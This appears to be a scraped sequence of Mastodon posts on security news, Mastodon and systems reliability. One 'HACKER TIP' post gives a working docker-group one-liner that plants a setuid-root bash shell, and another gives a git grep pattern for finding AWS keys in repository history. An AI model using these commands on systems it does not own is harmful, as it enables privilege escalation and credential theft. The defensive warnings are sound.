It's seemingly becoming more and more popular to hide malicious payloads in SGX enclaves: https://arxiv.org/abs/1710.00551
"Lastpass is storing the 2FA secret seed under a URL that can be derived from your password."
http://www.martinvigo.com/design-flaws-lastpass-2fa-implementation/
Mastodon's federated timeline might need this now that it's so popular: https://github.com/tootsuite/mastodon/issues/691
HACKER TIP: If you pop a low-priv linux shell. Don't forget to check if the user is in the "docker" group. If so, a root shell is only one line away:
$ docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p
screenshots and more here on my (crappy) blog: http://zacharykeeton.com/Linux_Privilege-Escalation-with-Docker/
SysAdmin tip: Don' t add any nonsudoers to the 'docker' group!
How to look through a git repo for AWS keys:
git rev-list --all | xargs git grep 'AK[A-Z0-9]{18}'
And people want everyone to run anything written by Poettering?
BSD FTW (and forever!)
I, for one, look forward to the release of gubernetes https://mastodon.cloud/media/ZjSwL-A3XNRGb4u1rwk
gnuplot is still my favorite graph program
middle of my talk: awesome
beginning and ending: needs work
remote unauthenticated RCE in Linux via specially crafted UDP packets https://nvd.nist.gov/vuln/detail/CVE-2016-10229 via @liamo
I think Mastodon is a ploy by ICANN to get people to buy generic TLDs
Remembering to design for failure is a critical part of engineering reliable systems
Probably the most important thing I've learned about web services is learning to make them degrade gracefully. What happens when the database is slow/down? What happens when you can't check the auth token? etc. etc.
why do Linux people seem to all still use Google Plus?
are there any business books that aren't just anecdata?
anyone else getting mobbed by spam calls? I get five to six spam phone calls every day now
my first block on mastodon. we have arrived
Mastodon is scaling better than VC funded products with hundreds of engineers
I've always thought Twitter should be a public utility and not a for profit company. Mastodon is really, really close to that idea
